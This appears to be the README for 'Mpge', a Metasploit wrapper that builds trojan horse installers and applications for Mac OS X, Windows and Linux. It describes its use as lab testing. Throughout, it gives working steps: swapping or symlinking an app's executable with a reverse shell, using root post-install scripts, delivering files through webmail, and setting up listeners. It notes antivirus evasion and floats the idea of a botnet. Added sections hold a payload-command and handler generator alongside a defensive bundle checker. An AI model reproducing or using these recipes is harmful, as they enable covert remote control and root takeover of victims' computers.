Mpge is a wrapper around the meterpreter tools of the Metasploit Framework (msfconsole, msfpayload and msfencode), directly integrated with Mac OS X Snow Leopard 10.6.8 and with OS X Mavericks 10.9. With Mpge you can make trojan horse files for Microsoft Windows, Linux, Mac OS X 10.3 Panther, Mac OS X 10.4 Tiger, Mac OS X 10.5 Leopard and OS X Mountain Lion 10.8.1. For Mac OS X the trojan horse file carries a reverse shell inside a .pkg or a .app file. I used three real Macs. Attacker: my MacBook with Snow Leopard 10.6.8. Targets: my iBook PowerPC G4 with Mac OS X 10.3.5 Panther and, later, my iMac with OS X Mountain Lion 10.8.1. All of them were connected to the intranet LAN of an Italian ISP. The MacBook listens and waits for the reverse shell from the target: the iBook PowerPC G4 receives a package, the user clicks on the .pkg file and enters the user password, and the attacker receives a reverse shell. For more details read Features and User Reviews.
- All tests were conducted for study, in a laboratory setting, to test IDS, firewalls and anti-malware on Microsoft Windows, Linux and Mac OS X on an intranet, which in my case is the network of an Italian ISP (the internal IP addresses used in all tests belong to the same private address class and are released by the ISP's DHCP server). It is an ordinary ADSL line. I use Mpge on my ADSL without firewalls or IDS. Because this is an intranet, it is important that the attacker host and the targets are in the same network. I conducted all tests only for Mac OS X and always with two Macs: one attacker (my MacBook) and one target (my iBook PowerPC G4 or my iMac). All Macs are in the same ISP intranet, first connected with RJ45 cables and later through the same intranet over Wi-Fi, without the powerline adapter that is connected with an RJ45 cable to my router. The program is released under the GNU General Public License version 3.0 (GPLv3). For the Metasploit Framework the licence is at metasploit.com/license.jsp. Disclaimer: This software is provided by the author "as is" and any expressed or implied warranties, including, but not limited to, the implied warranties of merchantability and fitness for a particular purpose, are disclaimed. In no event shall the author be liable for any direct, indirect, incidental, special, exemplary, or consequential damages (including, but not limited to, procurement of substitute goods or services; loss of use, hardware, data, profits, life, or limb; or business interruption) however caused and on any theory of liability, whether in contract, strict liability, or tort (including negligence or otherwise) arising in any way out of the use of this software, even if advised of the possibility of such damage. Don't hurt your laptop. You don't have to swing it so hard, you know. If you damage your machine in any way, it is your fault.
The connection between the MacBook and the iBook PowerPC G4 (or the other target, the iMac) gives the attacker MacBook a root shell on the target iBook PowerPC G4. It is established through a .pkg file downloaded from a public webmail portal and installed on the iBook (or, for the iMac, a .pkg built with Iceberg or a .dmg containing a .app file), and it amounts to an overlap between two shells: one on the listening MacBook and one on the target iBook (or iMac). Through this overlap (realized with the support of a 200 Mbps powerline adapter) you can view and create data on the iBook (or iMac) from the MacBook, for example create a folder on the iBook PowerPC G4 (or iMac) from the MacBook, the two being in the same intranet. The limitation is that such a connection is established through an intranet (Wi-Fi or LAN) carried over the house wiring by a powerline adapter connected with an RJ45 cable to my router in the same intranet.
- All tests were conducted first with RJ45 cables and afterwards over Wi-Fi, between my MacBook Snow Leopard 10.6.8 and my iBook PowerPC G4 (Mac OS X 10.3.5 Panther), and between my MacBook and my iMac (OS X Mountain Lion 10.8.1). For more details see the images in the Files directory: Test Environment iBook PowerPC G4 Mac OS X 10.3 Panther, MacBook Mac OS X Snow Leopard 10.6.3 and iMac OS X Mountain Lion 10.8.1.
- The connection is between two Macs in the same network: my MacBook as attacker and my iBook PowerPC G4 or my iMac OS X Mountain Lion 10.8.1 as target. The procedure is: on the attacker MacBook prepare a new reverse shell and build a new package with PackageMaker or Iceberg, send it to the target, start a listener on the attacker, download the trojan horse file on the target and click on it, and the connection opens. In all tests the password needed to install the trojan horse file on my iBook PowerPC G4 or my iMac is entered by the user on the target; in my lab that password is always entered by me.
- During my tests, as soon as the connection opened I captured it in the screenshots that are in the various folders of the Files directory.
- To reproduce this laboratory you use meterpreter (msfconsole, msfpayload and msfencode) as normal; you can also try with the addition of a powerline adapter. The payloads currently used for Mac OS X are osx/ppc/shell_reverse_tcp and osx/x86/shell_reverse_tcp, which open plain TCP reverse shell connections (not HTTP, and not encrypted). The reverse shell is inserted into .pkg and .app files.
- Release of Mpge for OS X Snow Leopard 10.6.8, in the Files directory: Mpge OS X Snow Leopard 10.6.8: Mpge v.1.3.tgz.
- New release of Mpge for OS X Mavericks 10.9, in the Files directory: Mpge v.1.0 OS X Mavericks: Mpge v.1.0 OS X Mavericks.tgz.
- The latest version of Mpge for OS X Mavericks 10.9 can repeat all the tests carried out in the laboratory with the MacBook (OS X Snow Leopard 10.6.8) as attacker and the iBook as target. In this new release the OS X Mavericks 10.9 machine is the attacker and the MacBook is the target. A plain osx/x86/shell_reverse_tcp can be inserted into any application: for example, hidden in place of the executable at /Applications/Safari.app/Contents/MacOS/Safari, so that clicking on Safari runs the reverse shell instead of Safari. To run Safari first and the reverse shell afterwards, you create a third executable, a bash script, that starts Safari and then runs the reverse shell. The webmail portal is only a staging point for the .app files containing the reverse shell and is located in a different network: the attacker (OS X Mavericks 10.9) uploads the file to the webmail portal with the attacker's e-mail address, and the target (the MacBook) downloads it from the same webmail portal with a different e-mail address, the target's. The OS X Mavericks 10.9 machine and the MacBook are in the same network. For more details see the Files directory: Mpge v.1.0 OS X Mavericks 10.9.
The mpge.sh script is a wrapper that for now consists of four main areas. The first area is dedicated to the creation of trojan horse files for Microsoft Windows, Mac OS X and Linux. The second area is for the listeners, which intercept the connection opened by our trojan horse files. The third area is dedicated to networking, in particular monitoring and collecting information on the IP address we are investigating. The fourth area is dedicated to the creation of trojan horse files for Mac OS X with extension .pkg, .app and .dmg (containing .app files) and of trojan horse files for Microsoft Windows. To create a trojan horse file you run the script and enter the IP address and port; for Windows you first need to go into the script and set the original file you want to use and then the name of the trojan horse file. Earlier I used BackBox in VMware Fusion for Mac (on my MacBook with Mac OS X Snow Leopard 10.6.8) for the reverse shell, and for the reverse shell with the evil.sh script, between the attacker (my MacBook, Mac OS X Snow Leopard 10.6.8) and the target (my iBook PowerPC G4, Mac OS X 10.3.5 Panther), and later between my MacBook and my iMac (OS X Mountain Lion 10.8.1). Then I decided to use Mpge directly integrated with the Metasploit Framework. Important: mpge.sh must be run as root. This wrapper of meterpreter is only for Mac OS X Snow Leopard 10.6.8. Test environment: attacker my MacBook (Mac OS X Snow Leopard 10.6.8), target my iBook PowerPC G4 (Mac OS X 10.3.5 Panther); afterwards attacker my MacBook (Mac OS X Snow Leopard 10.6.8), target my iMac (OS X Mountain Lion 10.8.1). Warning: creating packages for Mac OS X is a little complicated, but with practice you can build them quickly, and, as described here, the connection works.
The connection between two Macs in the same network, my MacBook as attacker and my iBook PowerPC G4 or my iMac OS X Mountain Lion 10.8.1 as target, sometimes worked and sometimes did not. In that case you prepare a new reverse shell on the attacker MacBook, build a new package with PackageMaker or Iceberg, send it to the target, start a listener on the attacker, download the file on the target, click on it and see whether the connection opens. Don't worry if it does not work; try again calmly, this is just for fun and for relaxing. I was able to capture the moment in which the connection, meaning a reverse shell, between my MacBook (Mac OS X Snow Leopard 10.6.8, attacker) and my target iBook PowerPC G4 (Mac OS X 10.3.5 Panther), and the other target my iMac (OS X Mountain Lion 10.8.1), is open. For more details go into the Files folder, which contains the folders Reverse Shell, The Pyramid, my MacBook and my iMac, my MacBook and my Mac iBook POWERPC G4, and Creation trojan horse file .app and .dmg, and see the images. In the last test, for example, with the .pkg built with Iceberg the connection (the reverse shell) did not open, whereas with the packages made earlier the connection always opens; see for example the images in the Reverse Shell folder. If a test does not succeed, stop thinking about what went wrong and decide when you want to try again. Structure of the wrapper: start ./mpge.sh. Insert IP: the IP address of the attacker, the one the listener binds to. Insert Port: the port the listener will listen on. Insert Original filename: the original file to be transformed (Microsoft Windows). Before creating the trojan horse, run the script ./move.sh in the Original-files directory; it copies the original file into /opt/local/msf/data/templates and /opt/local/msf/lib/msf/util. Insert Trojan filename: the name of the trojan horse file.
(Microsoft Windows) Mpge is an arc: from this point on Mpge is just a skeleton of functions and paths, to which you assign the appropriate variables. I work on Microsoft Windows, Mac OS X and Linux, but it is possible to create trojan files for other operating systems too, such as HP-UX, Sun Solaris etc. It is very fun! First area: Payloads and Encoding. Option 1: create a trojan horse file for Microsoft Windows containing a reverse shell. Option 2: create a trojan horse file for Microsoft Windows containing a vncinject reverse shell. For Mac OS X and Linux enter only the IP address and port, then select option 3, 4 or 5 and the reverse shell is ready. Option 3: create a trojan horse file for Mac OS X x86 containing a reverse shell. Option 4: create a trojan horse file for Mac OS X ppc containing a reverse shell. Option 5: create a trojan horse file for Linux containing a reverse shell. For these Mac OS X and Linux files it is not necessary to enter the original filename and the trojan filename, because the file names are fixed in mpge.sh. Second area: Starting Payloads. Option 6: start msfconsole listening for the Microsoft Windows reverse shell. Option 7: start msfconsole listening for the Microsoft Windows vncinject reverse shell. Option 8: start msfconsole listening for the Mac OS X x86 reverse shell. Option 9: start msfconsole listening for the Mac OS X ppc reverse shell. Option 10: start msfconsole listening for the Linux reverse shell. The listeners directory holds the resource files, for example osxrev.rc; set the attacker's IP address in them. For more details see the Options folder in the Files directory.
Third area: Option 11: IP interface. Option 12: status of IP (locate active IPs). Option 13: send mail (you send a mail with Mail.app). Option 14: results of IP (collection of information about the IP, sent by e-mail). Option 15: VisualRoute (tracking a network IP). Fourth area: Option 16: PackageMaker (start PackageMaker to create packages for Mac OS X). Option 17: Iceberg (create packages with Iceberg for the iMac with OS X Mountain Lion 10.8.1). Option 18: creation of .dmg files. Note: to obtain a reverse shell as root, build the reverse shell mac1 as root and, still as root, give it root permissions. With PackageMaker create a .pkg, put the executable in the root group and add it as a post-installation action. When the target receives the .pkg and clicks on it, the logged-in user enters their password and the installer runs the reverse shell with root permissions, so the attacker receives a reverse shell as root. (The installer runs post-installation scripts with root privileges once the user has authenticated, so the password prompt is the only user-visible check on this path; nothing else warns the user.) For more details see the images in the Options folder in the Files directory. Package creation for Mac OS X: to create the packages you can use PackageMaker or Iceberg; I prefer PackageMaker, and later I used Iceberg to create packages for the iMac with OS X Mountain Lion 10.8.1. For more details about option 17 (Iceberg) see the images in the directory Create package with Iceberg. PackageMaker, Iceberg, Firefox and Mail.app are already in the Mpge v.1.3.tgz file, while Safari.app (Applications) and Disk Utility.app (Applications/Utilities) must be copied into the msf3 directory. Once extracted on Mac OS X, go into /Developer/Applications. With option 16 (PackageMaker) it is possible to create packages for Mac OS X v10.4 Tiger, Mac OS X v10.3 Panther and Mac OS X v10.5 Leopard (Fig. 5 on the first page). For instructions read: Package for Mac OS X.doc. For option 17 (Iceberg) open the Files folder, then the folder Create package with Iceberg, and see the images. With option 18 it is possible to create .dmg files and put into them the .app files containing the reverse shell.
With option 17 it is possible to create .pkg files for Mountain Lion 10.8.1. Package creation for Microsoft Windows: packages for Microsoft Windows are created with options 1 and 2. For this experiment I used VMware Fusion on my Mac OS X Snow Leopard 10.6.8 with a Microsoft Vista virtual machine. For Microsoft Windows it is important to test the reverse shell inside files of different sizes. In this experiment I used the file AdbeRdr1014_en_US.exe, and AVG 2013 did not identify the reverse shell. The Microsoft Windows firewall was active, with permission to let the SSL port 443 through. Downloading AVG 2013 also brings its own firewall; in this case we emulated a user clicking Allow to open the connection. This is only an example: clearly you have to try different antivirus products and experiment with different file sizes and types. For more details see the images in the Microsoft Windows folder inside the Files folder. Package creation for Linux: regarding Linux, tested with a virtual machine, you can integrate Mpge with Rust (rust.sourceforge.net/download.html); Rust lets us create .rpm files containing .sh scripts. I leave this integration to you for fun! For more information see the images in the Linux folder inside the Files folder. Modules: you can use modules in autoscript or manual mode. Interesting, for example, is the module winenum.rb, which performs a full enumeration of the target host. In the directory created by this module I put a script compress.sh that compresses the data into a tar.gz file. To execute the module when the reverse shell is open, the command is run ./winenum.rb. You can then send the results to a server for data collection; see the Microsoft Windows folder. You can try different modules.
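The wrapper prompts above ("Insert IP", "Insert Port") are fed straight into the msfpayload command line and into the listener resource files (osxrev.rc and friends), so a typo or a stray shell character there produces a payload that calls home to the wrong address or a handler that never binds. The following is an added example, not code from Mpge: it checks both inputs, builds the payload command the wrapper uses (and the msfvenom equivalent, since msfpayload and msfencode were removed from Metasploit in 2015), and writes a handler .rc in the form the listeners directory expects. The function names, the payload whitelist and the sample values are assumptions for the example; it runs on any POSIX sh and never touches the network or Metasploit itself.

```sh
#!/bin/sh
# Added example (hypothetical helpers, not part of mpge.sh): input checks for
# the wrapper's "Insert IP" / "Insert Port" prompts, the payload command line
# the wrapper builds, and the handler resource file the listeners use.

# Dotted-quad IPv4 only: four octets 0-255, no empty octets, no other characters.
validate_lhost() {
  ip=$1
  case $ip in
    *[!0-9.]*|.*|*.|*..*) return 1 ;;
  esac
  old_ifs=$IFS; IFS=.
  set -- $ip
  IFS=$old_ifs
  [ $# -eq 4 ] || return 1
  for o in "$@"; do
    [ "$o" -le 255 ] || return 1
  done
  return 0
}

# 1-65535 only; 0 and 70000 are the typos a menu-driven wrapper sees most.
validate_lport() {
  case $1 in ''|*[!0-9]*) return 1 ;; esac
  [ "$1" -ge 1 ] && [ "$1" -le 65535 ] && return 0
  return 1
}

# payload_cmd <payload> <lhost> <lport> <outfile>
# Prints the legacy msfpayload line (as the wrapper used it) and the msfvenom line.
payload_cmd() {
  validate_lhost "$2" || { echo "bad LHOST: $2" >&2; return 1; }
  validate_lport "$3" || { echo "bad LPORT: $3" >&2; return 1; }
  case $1 in
    osx/ppc/shell_reverse_tcp|osx/x86/shell_reverse_tcp) fmt=macho ;;
    linux/x86/shell_reverse_tcp) fmt=elf ;;
    *) echo "unsupported payload: $1" >&2; return 1 ;;
  esac
  echo "msfpayload $1 LHOST=$2 LPORT=$3 X > $4"
  echo "msfvenom -p $1 LHOST=$2 LPORT=$3 -f $fmt -o $4"
}

# write_handler_rc <payload> <lhost> <lport> <rc file>
# One multi/handler per payload; LHOST is the attacker's own address.
write_handler_rc() {
  validate_lhost "$2" && validate_lport "$3" || return 1
  {
    echo "use exploit/multi/handler"
    echo "set PAYLOAD $1"
    echo "set LHOST $2"
    echo "set LPORT $3"
    echo "set ExitOnSession false"
    echo "exploit -j"
  } > "$4"
}

# Demo with constructed values: prints the command lines and a sample .rc file.
demo() {
  payload_cmd osx/x86/shell_reverse_tcp 192.168.1.10 4444 mac2
  rc=$(mktemp) && write_handler_rc osx/x86/shell_reverse_tcp 192.168.1.10 4444 "$rc" \
    && cat "$rc" && rm -f "$rc"
}
demo
```

Rejecting anything that is not a dotted quad also closes the obvious injection in a wrapper that interpolates user input into a command string: an entry like `10.0.0.1; rm -rf /` never reaches msfpayload.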
Test on an ISP network. Attacker: my MacBook. Target: my iBook PowerPC G4. Note: for all tests with the three Macs (my MacBook Snow Leopard 10.6.8, my iBook PowerPC G4 with Mac OS X 10.3.5 Panther and my iMac with OS X Mountain Lion 10.8.1) I first used a LAN connection with RJ45 cables connected to the gateway of an Italian ISP, and afterwards, for all tests, my Wi-Fi connection. ISP network: attacker my MacBook, target my iBook PowerPC G4; the .pkg file is installed on the iBook PowerPC G4 (target) while the MacBook is the attacker. In this experiment, as in all the others, I never used USB flash drives; I exchanged the files through a shared folder. The reverse shell with the evil script between my MacBook and my iBook PowerPC G4 is a very strange test; I do not know how I came up with it, it was curiosity!!! (image 7). With a .pkg containing the reverse shell, the connection continues after the installation of the .pkg finishes, as long as the user does not look at the active processes. From my MacBook, with the command uname -a, you can see the system of my iBook PowerPC G4. This type of package is very difficult to use: it only works once. It is difficult because it means inserting a file that only works locally (evil.sh) inside a remote connection (the reverse shell). If something is wrong you must rebuild everything: create a new reverse shell, assign the right permissions and create a new package from scratch, sometimes redoing the reverse shell a few times. I managed to make it work between the two Macs, my MacBook and my iBook PowerPC G4, 4 or 5 times, then I got tired, but when it succeeds it is very funny! It is like carpe diem, and I immediately take a screenshot, for example "The reverse shell with evil script between my MacBook and my Mac iBook PowerPC G4". It was an experiment and I tried it on an intranet (the internal IP addresses released by the DHCP server of an Italian ISP) without firewalls and without IDS. In this workshop I never tried the trojan files for Microsoft Windows.
As regards Mac OS X, I do not know whether a direct connection from your network to a different network works; I have never tried it. Second, for Mac OS X only the payload that creates unencrypted connections is included, and an unencrypted connection is certainly intercepted by IDS and blocked by firewalls. See the images in the folder: MacBook and Mac iBook POWERPC G4. Reverse Shell: attacker my MacBook, target my iBook PowerPC G4. This experiment is a classic reverse shell between my MacBook (Mac OS X Snow Leopard 10.6.8) and my iBook PowerPC G4 (Mac OS X 10.3.5 Panther). See image 4 Start reverse shell.png and the images in the folder Reverse Shell. The Pyramid: Internet and return to the internal LAN (the internal IP addresses released by the DHCP server of an Italian ISP). Attacker: my MacBook. Point of support: a webmail provider. Target: my iBook PowerPC G4. Note: after the trojan horse file is downloaded on the target (my iBook PowerPC G4), the connection is between the attacker (my MacBook) and the target (my iBook PowerPC G4). It is like building a pyramid! The attacker creates a package (built with the version I tested in the experiments, without any USB flash drive) that contains the reverse shell created as root, and sends the .pkg to a webmail provider, which is only a staging point for our trojan file. In this experiment the attacker (my MacBook, which is listening) logs into a simple webmail portal, for example mail.tiscali.it (IP address 126.96.36.199), with a user id and password and sends a file Test.zip, compressed with StuffIt Expander, containing an executable (mac1) that contains and runs an osx/ppc/shell_reverse_tcp. The target, my iBook PowerPC G4 (again me), logs into the same webmail portal with the same user id and password and downloads Test.zip.
Of course the attacker can send different trojan files directly to different e-mail addresses without logging into any webmail portal, as long as the file is not intercepted first. In my case, being a workshop, I wanted attacker and target to connect to the same webmail portal with the same login credentials. After the download on my iBook PowerPC G4 or iMac, the user extracts Test.zip and clicks on Test.pkg; to start the installation the user on the target enters the root password and runs the installation. The attacker and the target are located in the same network, the Italian ISP. The attacker MacBook receives the reverse shell as root of the target iBook PowerPC G4. See the images in the folders "Sending file .pkg created on my MacBook by e-mail to the target my Mac iBook POWERPC G4 (Internet)" and "Reverse Shell (Intranet)". In this test I sent the .pkg created on my MacBook by e-mail to the target iBook PowerPC G4, compressed into a file named Test.zip containing Test.pkg, which contains a reverse shell for Mac OS X ppc. The user on the target downloads Test.zip, clicks on Test.pkg and enters the password as root; when the installation of the .pkg is completed and you press Close, the reverse shell as root is open on my MacBook, and its process on the target stays alive until it is killed. This is a .pkg that contains a reverse shell and runs a script named evil.sh in post-installation. I created this package without following the official instructions, by performing various tests. The result is that evil.sh does nothing but hand the attacker the reverse shell, which inherits the permissions of the user who runs it. In this case the user on my iBook G4 is a normal user; in the other tests over the Internet I created the reverse shell with root permissions.
The root user on my iBook PowerPC G4 (again me) clicks on the .pkg file, enters the root password and returns to my MacBook (the attacker) a reverse shell as root. Imagine multiple users on the same ISP network accessing different portals and downloading this trojan horse file: if we add persistence we have a small botnet on the ISP network (which I never tried). It would be essential to integrate enterprise-type antivirus directly into the public webmail portals. See image 12 Reverse shell as root on MacBook of Mac iBook POWERPC G4.png in the Files folder: The Pyramid. One objective of this research is to hide the process. For more details about this test over the Internet and back to my LAN, see the images in the folder: The Pyramid. Test of the reverse shell contained in a .app file: attacker my MacBook (Mac OS X Snow Leopard 10.6.8), target my iMac (OS X Mountain Lion 10.8.1). Other tests were performed between my MacBook Snow Leopard 10.6.8 and my iMac with OS X Mountain Lion 10.8.1. We moved on to creating a .app application containing the executable mac2, which contains and runs an osx/x86/shell_reverse_tcp; see the images in the folder MacBook and iMac. Testing was conducted over LAN and Wi-Fi. A reverse shell opens between my MacBook and my iMac with OS X Mountain Lion. To create the .app file I initially used Automator. Afterwards I realized it was much easier to insert the reverse shell into the .app and create a symbolic link between the application's executable and the reverse shell, all contained inside the .app itself. To create a symbolic link in a Mac OS X application just go into the directory of the application (paths with a space must be quoted):
mv mac1 "/Users/Marco/Desktop/Font Book.app"
cd Contents
mv mac1 "/Users/Marco/Desktop/Font Book.app/Contents"
cd MacOS
mv mac1 "/Users/Marco/Desktop/Font Book.app/Contents/MacOS"
Here, in Contents/MacOS, is the real executable of the application in Mac OS X.
To create the symbolic link, simply move the executable mac1 (which contains and runs an osx/ppc/shell_reverse_tcp) or the executable mac2 (which contains and runs an osx/x86/shell_reverse_tcp) into this MacOS folder and type the command ln -sf <name of reverse shell> <name of application executable>; the executable inside Contents/MacOS carries the application's name, here Font Book:
ln -sf mac1 "Font Book"
Another, easier, way is: 1) copy the original application into msf3; 2) create the reverse shell and copy it over the original executable inside the application, for example: cp <reverse shell> "/Users/Marco/Desktop/msf3/Original-Files/Firefox.app/Contents/MacOS/<original file>" (e.g. firefox). You can change the application name in mpge.sh:
/Users/Marco/Desktop/msf3/msfpayload osx/x86/shell_reverse_tcp LHOST=$ip LPORT=$porta X > <name of the executable>
chmod +x <name of the executable>
See the images in the folder Creation trojan horse file .app and .dmg. Creation of trojan horse .app files and their .dmg container: attacker my MacBook, target my iMac. In this experiment I downloaded the file BBEdit.app; any application can be downloaded. Then, on the attacker (my MacBook, Mac OS X Snow Leopard 10.6.8), I went into the structure of the application and created a symbolic link to the reverse shell I had inserted into BBEdit.app. The user on my iMac (OS X Mountain Lion 10.8.1) clicks on BBEdit.app and opens the reverse shell to the attacker MacBook. See image 5 Reverse Shell on MacBook of iMac OS X Mountain Lion 10.8.1 with file BBEdit.png. After that it is a classic reverse shell. The same experiment is in the folder MacBook and iMac. See image 6 Reverse shell between MacBook and image iMac(Mac OS X Mountain Lion).png, which is the directory listing of the iMac in the reverse shell open on the attacker MacBook, and image 7 Directories of iMac with Mountain Lion.png. For more details see the images in the folder MacBook and iMac and in the folder Creation of trojan horse file .app and .dmg (that contains files .app).
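Both .app tricks described on this page leave a trace in the bundle itself: either the file named in CFBundleExecutable is a symlink to the dropped payload (the ln -sf above), or it has been replaced by a shell-script wrapper that starts the renamed original and then the payload (the Safari variant in the Mavericks notes), and in both cases a second executable appears in Contents/MacOS. The following is an added example, not part of Mpge or of the author's tests: a defender-side check that reads CFBundleExecutable from an XML Info.plist, verifies the main executable is a real Mach-O file rather than a symlink or a script, and lists any extra files beside it. Function names are hypothetical, the sample bundles are constructed in a temporary directory (the "Mach-O" is only the 4-byte magic), and it runs on any POSIX sh, so it can be used on a non-Mac host.

```sh
#!/bin/sh
# Added example (hypothetical helpers, not Mpge code): inspect a .app bundle
# for a replaced main executable. Sample bundles below are constructed inline.

# Print the CFBundleExecutable value from an XML Info.plist.
bundle_executable() {
  awk '/<key>CFBundleExecutable<\/key>/ { getline; gsub(/.*<string>|<\/string>.*/, ""); print; exit }' \
    "$1/Contents/Info.plist"
}

# True if the first four bytes are a Mach-O or fat-binary magic.
is_macho() {
  magic=$(od -An -tx1 -N4 "$1" | tr -d ' \n')
  case $magic in
    feedface|cefaedfe|feedfacf|cffaedfe|cafebabe|bebafeca) return 0 ;;
    *) return 1 ;;
  esac
}

# check_app_bundle <Name.app>: one finding per line on stdout.
# Returns 0 when clean, 1 when something is wrong, 2 when not a bundle.
check_app_bundle() {
  app=$1
  macos=$app/Contents/MacOS
  [ -f "$app/Contents/Info.plist" ] && [ -d "$macos" ] || return 2
  exe=$(bundle_executable "$app")
  main=$macos/$exe
  bad=0
  if [ -L "$main" ]; then
    echo "main executable '$exe' is a symlink -> $(readlink "$main")"; bad=1
  elif [ ! -f "$main" ]; then
    echo "main executable '$exe' missing"; bad=1
  elif ! is_macho "$main"; then
    echo "main executable '$exe' is not Mach-O (starts with: $(head -c 2 "$main" | tr -d '\n'))"; bad=1
  fi
  # The payload has to live somewhere: any second file in MacOS/ deserves a look.
  for f in "$macos"/*; do
    [ "$f" = "$main" ] && continue
    [ -e "$f" ] || continue
    echo "extra file in MacOS/: $(basename "$f")"; bad=1
  done
  return $bad
}

# --- constructed samples -----------------------------------------------------
# Clean bundle: Info.plist plus a main executable carrying the cf fa ed fe magic.
make_bundle() {  # $1 path/to/Name.app  $2 executable name
  mkdir -p "$1/Contents/MacOS"
  printf '<?xml version="1.0" encoding="UTF-8"?>\n<plist version="1.0">\n<dict>\n\t<key>CFBundleExecutable</key>\n\t<string>%s</string>\n</dict>\n</plist>\n' \
    "$2" > "$1/Contents/Info.plist"
  printf '\317\372\355\376' > "$1/Contents/MacOS/$2"
  chmod 755 "$1/Contents/MacOS/$2"
}
# Wrapper-script variant: original renamed, payload dropped beside it, script
# under the original name runs both (what the text describes for Safari).
make_trojan_bundle() {
  make_bundle "$1" "$2"
  m=$1/Contents/MacOS
  mv "$m/$2" "$m/$2.orig"
  printf 'PAYLOAD' > "$m/mac2"   # stand-in for the reverse-shell binary
  printf '#!/bin/sh\n"$(dirname "$0")/%s.orig" "$@" &\n"$(dirname "$0")/mac2"\n' "$2" > "$m/$2"
  chmod 755 "$m/$2" "$m/mac2"
}
# Symlink variant: the ln -sf from the text, main name now points at the payload.
make_symlink_bundle() {
  make_bundle "$1" "$2"
  m=$1/Contents/MacOS
  printf 'PAYLOAD' > "$m/mac1"; chmod 755 "$m/mac1"
  ln -sf mac1 "$m/$2"
}

demo_dir=$(mktemp -d)
make_bundle "$demo_dir/Clean.app" Clean
make_trojan_bundle "$demo_dir/Trojan.app" Trojan
make_symlink_bundle "$demo_dir/Font Book.app" "Font Book"
for b in Clean Trojan "Font Book"; do
  echo "== $b.app"; check_app_bundle "$demo_dir/$b.app" && echo "ok"
done
rm -rf "$demo_dir"
```

On a real Mac the authoritative check is `codesign --verify --deep --strict Name.app`: a replaced or symlinked executable breaks the seal of a signed application, and Gatekeeper (OS X 10.8) refuses unsigned downloads by default. The script above is for the cases that check does not cover, such as the unsigned Panther- and Tiger-era applications used in these tests, or a bundle pulled off a mail server for a look on a Linux box.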
Mpge is directly integrated with the Metasploit Framework, but as root you must first install ruby 1.9.x (port install ruby19) and mysql5 (port install mysql5) with MacPorts. Download Mpge v.1.3.tgz or Mpge v.1.3.dmg and extract it, then edit mpge.sh and insert your path: for example replace /Users/Marco/Desktop/msf3 with /Users/<your user>/Desktop/msf3. The applications Iceberg.app, IP-Scanner.app and PackageMaker.app used on the MacBook with Mac OS X Snow Leopard 10.6.8 are included in Mpge v.1.3.tgz. The other applications are at these paths: /Applications/Utilities/Disk Utility.app, /Applications/Firefox.app, /Applications/Mail.app, /Applications/Safari.app; copy them into the msf3 directory. Mpge OS X Mavericks 10.9: first download Mpge v.1.0 OS X Mavericks.tgz, decompress it and copy the msf directory into /opt. Install there all the elements needed for Metasploit Framework 4.8 on OS X Mavericks, then go into /opt/msf and make the script executable with chmod 755 mpge.sh (not 777: a world-writable script that is run as root lets any local user change what root executes), and Mpge is ready.